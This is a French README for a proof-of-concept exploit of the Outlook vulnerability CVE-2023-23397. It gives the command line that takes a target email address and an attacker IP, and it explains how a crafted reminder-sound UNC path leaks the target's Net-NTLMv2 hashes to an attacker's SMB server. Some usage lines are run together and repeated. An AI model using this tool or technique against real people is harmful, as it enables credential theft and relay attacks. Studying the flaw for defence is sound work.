
CVE-2023-23397 PoC
Ceci est une preuve de concept (PoC) d'exploit pour CVE-2023-23397, une vulnérabilité dans le client Windows Microsoft Outlook.
pywin32pywin32 requis en exécutant pip install pywin32.python Exploit.py <save_or_send> <target_email> <attacker_ip>.pywin32 requis en exécutant pip install pywin32.python Exploit.py <save_or_send> <target_email> <attacker_ip>.<save_or_send> : Choisissez entre « save » ou « send ». « save » enregistrera l'e-mail malveillant sous forme de fichier, tandis que « send » enverra l'e-mail directement à la cible.<target_email> : L'adresse e-mail de l'utilisateur cible.<attacker_ip> : L'adresse IP du serveur SMB de l'attaquant.Ceci est un aperçu général de CVE-2023-23397, une vulnérabilité dans le client Windows Microsoft Outlook.
CVE-2023-23397 est une vulnérabilité qui permet à un attaquant de créer un e-mail malveillant qui, lorsqu'il est traité par le client Outlook, divulgue automatiquement les hachages Net-NTLMv2 de l'utilisateur cible. Aucune interaction de l'utilisateur n'est requise pour déclencher l'exploit. Les hachages divulgués peuvent être utilisés pour des attaques de relais ou pour casser les identifiants sous-jacents.
La vulnérabilité existe en raison de la façon dont Outlook gère la propriété PidLidReminderFileParameter dans les messages électroniques. Cette propriété permet à l'expéditeur du message de définir un son de notification personnalisé pour des éléments tels que les notifications de réunion. En créant un message avec une propriété PidLidReminderFileParameter personnalisée contenant un chemin UNC (Universal Naming Convention) pointant vers un serveur SMB contrôlé par l'attaquant, l'attaquant peut amener le client Outlook de la cible à divulguer les hachages Net-NTLMv2 lorsqu'il se connecte au serveur SMB.
Le script d'exploit de preuve de concept (PoC) fourni génère un e-mail malveillant avec la propriété PidLidReminderFileParameter personnalisée et l'enregistre soit sous forme de fichier, soit l'envoie directement à l'adresse e-mail cible. L'attaquant doit configurer un serveur SMB pour capturer les hachages Net-NTLMv2 divulgués.
Cet aperçu général n'est fourni qu'à des fins éducatives. Comprendre la vulnérabilité et son impact peut aider à améliorer les pratiques de sécurité et à développer des défenses efficaces contre des attaques similaires.